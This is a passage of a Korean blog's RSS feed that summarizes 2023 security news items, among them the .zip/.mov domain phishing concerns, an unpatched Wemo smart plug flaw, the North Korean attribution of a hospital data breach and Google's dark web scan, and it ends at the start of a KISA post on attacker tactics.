이를 바탕으로 보안을 강화할 수 있도록 하고 있다. 이에 &amp;lt;보안뉴스&amp;gt;&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/636</guid>
      <comments>https://jennana.tistory.com/636#entry636comment</comments>
      <pubDate>Sun, 21 May 2023 09:00:34 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜</title>
      <link>https://jennana.tistory.com/635</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;601&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bgo2H5/btsgGjClVd7/GCELcOfW2m7u38XMMigg20/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bgo2H5/btsgGjClVd7/GCELcOfW2m7u38XMMigg20/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bgo2H5/btsgGjClVd7/GCELcOfW2m7u38XMMigg20/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbgo2H5%2FbtsgGjClVd7%2FGCELcOfW2m7u38XMMigg20%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;601&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;601&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;구글이 최근 새로운 인터넷 도메인 .zip과 .mov를 제안하였지만 보안 전문가들은 기존의 파일압축 파일과 동영상파일의 확장자와 동일하기 때문에 피싱 등에 악용될 수 있어 우려를 표하고 있다. 예를 들면 트위터에서는 .zip파일과 .mov파일을 도메인으로 인식하여 자동으로 링크가 생성이 된다.&lt;/b&gt;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?mtype=1&amp;amp;idx=118167&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?mtype=1&amp;amp;idx=118167&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;IT 외신 블리핑컴퓨터에 의하면 구글이 최근 새로운 인터넷 도메인을 제안했다고 한다. 바로 .zip과 .mov이다. 이 외에도 6개의 최고 수준 도메인(TLD)을 새로 도입해 사용자들이 호스팅 웹사이트나 &quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=1&amp;amp;idx=118167&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cNWivC/hySF3jdM8X/Hz710AJ9VmO02a1j3kxw4K/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=118167&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=118167&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?mtype=1&amp;amp;idx=118167&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cNWivC/hySF3jdM8X/Hz710AJ9VmO02a1j3kxw4K/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;구글의 ZIP과 MOV 도메인, 보안 전문가들의 우려 불러일으켜&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;IT 외신 블리핑컴퓨터에 의하면 구글이 최근 새로운 인터넷 도메인을 제안했다고 한다. 바로 .zip과 .mov이다. 이 외에도 6개의 최고 수준 도메인(TLD)을 새로 도입해 사용자들이 호스팅 웹사이트나 &lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/635</guid>
      <comments>https://jennana.tistory.com/635#entry635comment</comments>
      <pubDate>Sat, 20 May 2023 16:29:20 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어</title>
      <link>https://jennana.tistory.com/634</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;533&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/YcHIs/btsgCCCpB9G/oyq9NUTyovY6wdOISX1i40/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/YcHIs/btsgCCCpB9G/oyq9NUTyovY6wdOISX1i40/img.jpg&quot; data-alt=&quot;F7063 모델 스마트 플러그, 출처 : belkin&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/YcHIs/btsgCCCpB9G/oyq9NUTyovY6wdOISX1i40/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FYcHIs%2FbtsgCCCpB9G%2Foyq9NUTyovY6wdOISX1i40%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;533&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;533&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;F7063 모델 스마트 플러그, 출처 : belkin&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;위모(Wemo)의 미니 스마트 플러그 제품에서 취약점리 발생했는데 이를 통해 공격자는 연결된 장비를 원격으로 조작하거나 내부 네트워크에 침투하는 등의 공격을 수행할 수 있게 된다. 이 취약점은 F7C063 모델에서 발견되었으며, 버퍼 오버플로우를 이용하여 원격 명령 삽입을 가능하게 하지만 보안 업체인 스터넘(Sternum)에 따르면 해당 모델은 지원이 종료되어 패치가 제공되지 않을 것이라고 밝혔다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;br&gt;- 스마트 플러그 : 가정이나 산업 현장에서 사용되는 장비로, 원격에서 모바일 앱을 통해 제어할 수 있는 기능을 제공. &lt;br&gt;- 이번 취약점 :&amp;nbsp;&amp;nbsp;스마트 플러그의 &lt;b&gt;펌웨어&lt;/b&gt;에서 발생하는 &lt;b&gt;버퍼 오버플로우 취약점&lt;/b&gt;으로 분류되며, 긴 &lt;b&gt;FriendlyName 변수&lt;/b&gt;를 이용해 공격자가 장비를 조작할 수 있음.&lt;br&gt;- 취약점 공개 여부 : 스터넘은 이번 연구 결과를 개념 증명용으로만 공개하고 실제 공격 시나리오는 발표하지 않을 예정. &lt;br&gt;- 대비 방법 : 사용자이 UPNP 포트를 인터넷에 연결하지 않고, 민감한 데이터나 시스템이 연결된 네트워크와 분리되도록 조치하는 것을 권장&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문정후 기자, 위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=118203&amp;amp;page=3&amp;amp;kind=1&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=118203&amp;amp;page=3&amp;amp;kind=1&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;위모(Wemo)의 미니 스마트 플러그에서 물리적 피해를 일으킬 수 있는 취약점이 발견됐다. 위모 미니 스마트 플러그는, 어떤 장비든 원격에서 모바일 앱을 통해 제어할 수 있도록 해 주는 장치로, &quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118203&amp;amp;page=3&amp;amp;kind=1&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bUKjDJ/hySF60J9HN/M8AlwMkfQUfISsIYWqN3HK/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=118203&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=118203&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=118203&amp;amp;page=3&amp;amp;kind=1&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bUKjDJ/hySF60J9HN/M8AlwMkfQUfISsIYWqN3HK/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;위모 미니 스마트 플러그 제품 일부에서 위험한 취약점 나왔으나 패치 없어&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;위모(Wemo)의 미니 스마트 플러그에서 물리적 피해를 일으킬 수 있는 취약점이 발견됐다. 위모 미니 스마트 플러그는, 어떤 장비든 원격에서 모바일 앱을 통해 제어할 수 있도록 해 주는 장치로, &lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/634</guid>
      <comments>https://jennana.tistory.com/634#entry634comment</comments>
      <pubDate>Fri, 19 May 2023 17:05:01 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 2021년 서울대병원 해킹&amp;middot;개인정보 유출사건, 북한 소행으로 드러났다</title>
      <link>https://jennana.tistory.com/633</link>
      <description>&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1773&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/O4hoQ/btsfA2Bqdlm/72mbM4FYUUdA22MVX0kCO1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/O4hoQ/btsfA2Bqdlm/72mbM4FYUUdA22MVX0kCO1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/O4hoQ/btsfA2Bqdlm/72mbM4FYUUdA22MVX0kCO1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FO4hoQ%2FbtsfA2Bqdlm%2F72mbM4FYUUdA22MVX0kCO1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1080&quot; height=&quot;1773&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1773&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;지난 2021년에 발생한 서울대학교병원 개인정보 유출사건을 수사한결과 북한 해킹조직의 소행으로 밝혀졌으며 21년 5월경부터 6월경까지 국내•외에 소재한 서버 7대를 장악한 이후 내부망에 침입했다고 한다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- 피해내용&lt;br&gt;&amp;nbsp;&amp;nbsp;1) 환자 81만명&lt;br&gt;&amp;nbsp;&amp;nbsp;2) 전•현직 직원 1만 7000여명 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;gt;&amp;gt; 83만명의 개인정보 유출&lt;br&gt;- 북한이라고 추정 이유 : 기존 북한발 사건과 IP, 인터넷 가입 정보, IP주소 세탁법, 시스템 침입•관리 수법이 같음, 북한어휘를 사용&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;박은주 기자, 2021년 서울대병원 해킹·개인정보 유출사건, 북한 소행으로 드러났다, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117945&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117945&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;2021년 서울대병원 해킹·개인정보 유출사건, 북한 소행으로 드러났다&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;경찰청 국가수사본부(사이버수사국)는 지난 2021년에 발생한 서울대학교병원개인정보 유출사건을 수사한 결과, 북한 해킹 조직의 소행이라고 10일 밝혔다.&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117945&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/9m3nS/hySButSERT/Nt1XflxQIDVn2YJmFhQEk0/img.jpg?width=1000&amp;amp;height=604&amp;amp;face=0_0_1000_604&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=117945&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=117945&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117945&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/9m3nS/hySButSERT/Nt1XflxQIDVn2YJmFhQEk0/img.jpg?width=1000&amp;amp;height=604&amp;amp;face=0_0_1000_604')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;2021년 서울대병원 해킹·개인정보 유출사건, 북한 소행으로 드러났다&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;경찰청 국가수사본부(사이버수사국)는 지난 2021년에 발생한 서울대학교병원개인정보 유출사건을 수사한 결과, 북한 해킹 조직의 소행이라고 10일 밝혔다.&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/633</guid>
      <comments>https://jennana.tistory.com/633#entry633comment</comments>
      <pubDate>Sat, 13 May 2023 23:27:25 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 구글, 곧 사용자들의 다크웹 스캔 허용한다</title>
      <link>https://jennana.tistory.com/632</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;848&quot; data-origin-height=&quot;591&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/brEDUO/btseP510pWQ/ag2a4i2AWNXWyYc4MpOWQk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/brEDUO/btseP510pWQ/ag2a4i2AWNXWyYc4MpOWQk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/brEDUO/btseP510pWQ/ag2a4i2AWNXWyYc4MpOWQk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbrEDUO%2FbtseP510pWQ%2Fag2a4i2AWNXWyYc4MpOWQk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;848&quot; height=&quot;591&quot; data-origin-width=&quot;848&quot; data-origin-height=&quot;591&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;기사요약 :&lt;/span&gt; &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;구글에서 미국 사용자들을 대상으로 다크웹에서 스캔된 개인정보를 제공하는 서비스를 시작한다고 하며 글로벌 사용자들에게도 제공할 계획을 가지고 있다고 한다. &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 이 서비스가 저공된다면 자신의 개인정보가 다크웹 상에서 유통되고 있는지 확인할 수 있으며&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 확인할수 있는 정보로는 자신의 &lt;b&gt;지메일ID, 이름, 주소, 이메일주소, 전화번호, 사회보장번호&lt;/b&gt;라고 한다. 구글은 유출된 사용자들에게 자동으로 보고서 및 권장 조치사항을 전달할 예정이다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;문가용 기자, 구글, 곧 사용자들의 다크웹 스캔 허용한다, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=117993&quot;&gt;https://www.boannews.com/media/view.asp?idx=117993&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1683816983204&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;구글, 곧 사용자들의 다크웹 스캔 허용한다&quot; data-og-description=&quot;보안 외신 시큐리티위크에 의하면 구글이 미국 사용자들을 대상으로 새로운 서비스를 제공하기 시작했다고 한다. 다크웹을 스캔하여 자신의 지메일 ID, 이름, 주소, 이메일 주소, 전화번호, 사회&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117993&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=117993&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/AP1G5/hySBDpvbVt/sYqrgdBKet8KnAFkuU2140/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=117993&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117993&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/AP1G5/hySBDpvbVt/sYqrgdBKet8KnAFkuU2140/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;구글, 곧 사용자들의 다크웹 스캔 허용한다&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;보안 외신 시큐리티위크에 의하면 구글이 미국 사용자들을 대상으로 새로운 서비스를 제공하기 시작했다고 한다. 다크웹을 스캔하여 자신의 지메일 ID, 이름, 주소, 이메일 주소, 전화번호, 사회&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/632</guid>
      <comments>https://jennana.tistory.com/632#entry632comment</comments>
      <pubDate>Thu, 11 May 2023 23:56:38 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] TTPs#1  홈페이지를 통한 내부망 장악</title>
      <link>https://jennana.tistory.com/631</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;TTPs#1&amp;nbsp; &lt;/b&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;홈페이지를 통한 내부망 장악&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size14&quot;&gt;출처 : KISA 보호나라,&amp;nbsp; &lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTP&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=35330&quot; target=&quot;_self&quot;&gt;&lt;span&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTP&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=35330&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;KISA 인터넷 보호나라&amp;amp;KrCERT&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;KISA 인터넷 보호나라&amp;amp;KrCERT&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTP&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=35330&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/b9FYWg/hySvpeRs0o/IbTf6cYDU96X4OLxfWt4p0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bsfGf4/hySvqLBhe7/5klZvRKW45u0CBgOlxa8o1/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bdrrf3/hySvjTpT0l/U6WFxWZn6huijkN1ERmAgK/img.png?width=1280&amp;amp;height=400&amp;amp;face=0_0_1280_400&quot; data-og-url=&quot;http://www.boho.or.kr:80&quot;&gt;&lt;a href=&quot;http://www.boho.or.kr:80&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=TTP&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=35330&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/b9FYWg/hySvpeRs0o/IbTf6cYDU96X4OLxfWt4p0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bsfGf4/hySvqLBhe7/5klZvRKW45u0CBgOlxa8o1/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/bdrrf3/hySvjTpT0l/U6WFxWZn6huijkN1ERmAgK/img.png?width=1280&amp;amp;height=400&amp;amp;face=0_0_1280_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 인터넷 보호나라&amp;amp;KrCERT&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 인터넷 보호나라&amp;amp;KrCERT&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;565&quot; data-origin-height=&quot;802&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bNY6Bc/btsd0ngB5JU/iukvBXN3ls6XkjQQthDIMk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bNY6Bc/btsd0ngB5JU/iukvBXN3ls6XkjQQthDIMk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bNY6Bc/btsd0ngB5JU/iukvBXN3ls6XkjQQthDIMk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbNY6Bc%2Fbtsd0ngB5JU%2FiukvBXN3ls6XkjQQthDIMk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;565&quot; height=&quot;802&quot; data-origin-width=&quot;565&quot; data-origin-height=&quot;802&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
